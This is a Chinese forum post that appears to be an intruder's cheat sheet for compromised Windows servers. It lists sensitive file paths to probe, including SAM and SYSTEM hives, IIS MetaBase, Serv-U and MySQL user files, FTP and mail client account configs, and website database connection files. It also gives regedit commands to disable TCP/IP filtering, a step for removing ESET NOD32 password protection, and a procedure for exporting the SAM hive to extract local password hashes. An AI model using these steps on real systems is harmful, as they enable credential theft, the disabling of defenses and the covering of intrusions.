Administrator.lnkC:\WINDOWS\web.configc:\web\index.htmlc:\www\index.htmlc:\WWWROOT\index.htmlc:\website\index.htmlc:\web\index.aspc:\www\index.aspc:\wwwsite\index.aspc:\WWWROOT\index.aspc:\web\index.phpc:\www\index.phpc:\WWWROOT\index.phpc:\WWWsite\index.phpc:\web\default.htmlc:\www\default.htmlc:\WWWROOT\default.htmlc:\website\default.htmlc:\web\default.aspc:\www\default.aspc:\wwwsite\default.aspc:\WWWROOT\default.aspc:\web\default.phpc:\www\default.phpc:\WWWROOT\default.phpc:\WWWsite\default.phpC:\Inetpub\wwwroot\pagerror.gifc:\windows\notepad.exec:\winnt\notepad.exeC:\Program Files\Microsoft Office\OFFICE10\winword.exeC:\Program Files\Microsoft Office\OFFICE11\winword.exeC:\Program Files\Microsoft Office\OFFICE12\winword.exeC:\Program Files\Internet Explorer\IEXPLORE.EXEC:\Program Files\winrar\rar.exeC:\Program Files\360\360Safe\360safe.exeC:\Program Files\360Safe\360safe.exeC:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.logc:\ravbin\store.inic:\rising.iniC:\Program Files\Rising\Rav\RsTask.xmlC:\Documents and Settings\All Users\Start Menu\desktop.iniC:\Documents and Settings\Administrator\My Documents\Default.rdpC:\Documents and Settings\Administrator\Cookies\index.datC:\Documents and Settings\Administrator\My Documents\新建 文本文档.txtC:\Documents and Settings\Administrator\桌面\新建 文本文档.txtC:\Documents and Settings\Administrator\My Documents\1.txtC:\Documents and Settings\Administrator\桌面\1.txtC:\Documents and Settings\Administrator\My Documents\a.txtC:\Documents and Settings\Administrator\桌面\a.txtC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpgE:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htmC:\Program Files\RhinoSoft.com\Serv-U\Version.txtC:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.iniC:\Program Files\Symantec\SYMEVENT.INFC:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exeC:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdfC:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdfC:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdfC:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htmC:\Program Files\Microsoft SQL Server\MSSQL\README.TXTC:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dllC:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.iniC:\MySQL\MySQL Server 5.0\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.iniC:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frmC:\Program Files\MySQL\MySQL Server 5.0\COPYINGC:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sqlC:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exec:\MySQL\MySQL Server 4.1\bin\mysql.exec:\MySQL\MySQL Server 4.1\data\mysql\user.frmC:\Program Files\Oracle\oraconfig\Lpk.dllC:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exeC:\WINDOWS\system32\inetsrv\w3wp.exeC:\WINDOWS\system32\inetsrv\inetinfo.exeC:\WINDOWS\system32\inetsrv\MetaBase.xmlC:\WINDOWS\system32\inetsrv\iisadmpwd\achg.aspC:\WINDOWS\system32\config\default.LOGC:\WINDOWS\system32\config\samC:\WINDOWS\system32\config\systemc:\CMailServer\config.inic:\program files\CMailServer\config.inic:\tomcat6\tomcat6\bin\version.shc:\tomcat6\bin\version.shc:\tomcat\bin\version.shc:\program files\tomcat6\bin\version.shC:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.shc:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.logc:\Apache2\Apache2\bin\Apache.exec:\Apache2\bin\Apache.exec:\Apache2\php\license.txtC:\Program Files\Apache Group\Apache2\bin\Apache.exe/usr/local/tomcat5527/bin/version.sh/usr/share/tomcat6/bin/startup.sh/usr/tomcat6/bin/startup.shc:\Program Files\QQ2007\qq.exec:\Program Files\Tencent\qq\User.dbc:\Program Files\Tencent\qq\qq.exec:\Program Files\Tencent\qq\bin\qq.exec:\Program Files\Tencent\qq2009\qq.exec:\Program Files\Tencent\qq2008\qq.exec:\Program Files\Tencent\qq2010\bin\qq.exec:\Program Files\Tencent\qq\Users\All Users\Registry.dbC:\Program Files\Tencent\TM\TMDlls\QQZip.dllc:\Program Files\Tencent\Tm\Bin\Txplatform.exec:\Program Files\Tencent\RTXServer\AppConfig.xmlC:\Program Files\Foxmal\Foxmail.exeC:\Program Files\Foxmal\accounts.cfgC:\Program Files\tencent\Foxmal\Foxmail.exeC:\Program Files\tencent\Foxmal\accounts.cfgC:\Program Files\LeapFTP 3.0\LeapFTP.exeC:\Program Files\LeapFTP\LeapFTP.exec:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exec:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txtC:\Program Files\FlashFXP\FlashFXP.iniC:\Program Files\FlashFXP\flashfxp.exec:\Program Files\Oracle\bin\regsvr32.exec:\Program Files\腾讯游戏\QQGAME\readme.txtc:\Program Files\tencent\腾讯游戏\QQGAME\readme.txtc:\Program Files\tencent\QQGAME\readme.txtC:\Program Files\StormII\Storm.exe3.网站相对路径:/config.phphttp://www.cnblogs.com/config.php../config.phphttp://www.cnblogs.com/../config.php/config.inc.php./config.inc.phphttp://www.cnblogs.com/config.inc.php../config.inc.phphttp://www.cnblogs.com/../config.inc.php/conn.php./conn.phphttp://www.cnblogs.com/conn.php../conn.phphttp://www.cnblogs.com/../conn.php/conn.asp./conn.asphttp://www.cnblogs.com/conn.asp../conn.asphttp://www.cnblogs.com/../conn.asp/config.inc.php./config.inc.phphttp://www.cnblogs.com/config.inc.php../config.inc.phphttp://www.cnblogs.com/../config.inc.php/config/config.phphttp://www.cnblogs.com/config/config.php../config/config.phphttp://www.cnblogs.com/../config/config.php/config/config.inc.php./config/config.inc.phphttp://www.cnblogs.com/config/config.inc.php../config/config.inc.phphttp://www.cnblogs.com/../config/config.inc.php/config/conn.php./config/conn.phphttp://www.cnblogs.com/config/conn.php../config/conn.phphttp://www.cnblogs.com/../config/conn.php/config/conn.asp./config/conn.asphttp://www.cnblogs.com/config/conn.asp../config/conn.asphttp://www.cnblogs.com/../config/conn.asp/config/config.inc.php./config/config.inc.phphttp://www.cnblogs.com/config/config.inc.php../config/config.inc.phphttp://www.cnblogs.com/../config/config.inc.php/data/config.phphttp://www.cnblogs.com/data/config.php../data/config.phphttp://www.cnblogs.com/../data/config.php/data/config.inc.php./data/config.inc.phphttp://www.cnblogs.com/data/config.inc.php../data/config.inc.phphttp://www.cnblogs.com/../data/config.inc.php/data/conn.php./data/conn.phphttp://www.cnblogs.com/data/conn.php../data/conn.phphttp://www.cnblogs.com/../data/conn.php/data/conn.asp./data/conn.asphttp://www.cnblogs.com/data/conn.asp../data/conn.asphttp://www.cnblogs.com/../data/conn.asp/data/config.inc.php./data/config.inc.phphttp://www.cnblogs.com/data/config.inc.php../data/config.inc.phphttp://www.cnblogs.com/../data/config.inc.php/include/config.phphttp://www.cnblogs.com/include/config.php../include/config.phphttp://www.cnblogs.com/../include/config.php/include/config.inc.php./include/config.inc.phphttp://www.cnblogs.com/include/config.inc.php../include/config.inc.phphttp://www.cnblogs.com/../include/config.inc.php/include/conn.php./include/conn.phphttp://www.cnblogs.com/include/conn.php../include/conn.phphttp://www.cnblogs.com/../include/conn.php/include/conn.asp./include/conn.asphttp://www.cnblogs.com/include/conn.asp../include/conn.asphttp://www.cnblogs.com/../include/conn.asp/include/config.inc.php./include/config.inc.phphttp://www.cnblogs.com/include/config.inc.php../include/config.inc.phphttp://www.cnblogs.com/../include/config.inc.php/inc/config.phphttp://www.cnblogs.com/inc/config.php../inc/config.phphttp://www.cnblogs.com/../inc/config.php/inc/config.inc.php./inc/config.inc.phphttp://www.cnblogs.com/inc/config.inc.php../inc/config.inc.phphttp://www.cnblogs.com/../inc/config.inc.php/inc/conn.php./inc/conn.phphttp://www.cnblogs.com/inc/conn.php../inc/conn.phphttp://www.cnblogs.com/../inc/conn.php/inc/conn.asp./inc/conn.asphttp://www.cnblogs.com/inc/conn.asp../inc/conn.asphttp://www.cnblogs.com/../inc/conn.asp/inc/config.inc.php./inc/config.inc.phphttp://www.cnblogs.com/inc/config.inc.php../inc/config.inc.phphttp://www.cnblogs.com/../inc/config.inc.php/index.php./index.phphttp://www.cnblogs.com/index.php../index.phphttp://www.cnblogs.com/../index.php/index.asp./index.asphttp://www.cnblogs.com/index.asp../index.asphttp://www.cnblogs.com/../index.asp去除TCPIP筛选TCP/IP筛选在注册表里有三处,分别是:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TcpipHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TcpipHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip分别用regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpipregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpipregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip命令来导出注册表项然后把 三个文件里的EnableSecurityFilters”=dword:00000001,改成EnableSecurityFilters”=dword:00000000再将以上三个文件分别用regedit -s D:\a.regregedit -s D:\b.regregedit -s D:\c.reg导入注册表即可Symantec病毒日志:C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\LogsSymantec病毒备份:C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\QuarantineNod32病毒备份:C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\QuarantineNod32移除密码保护:删除HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID即可获取本机hash首先导出注册表 regedit /e d:\aa.reg “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” (2000)reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\aa.reg (2003)注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了hash 抓完了记得把自己的账户密码改过来哦!据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~

该贴由system转至本版2014-9-6 8:19:27




赞(0)    操作        顶端 
总帖数
1
每页帖数
101/1页1
返回列表
发新帖子
请输入验证码: 点击刷新验证码
您需要登录后才可以回帖 登录 | 注册
技术讨论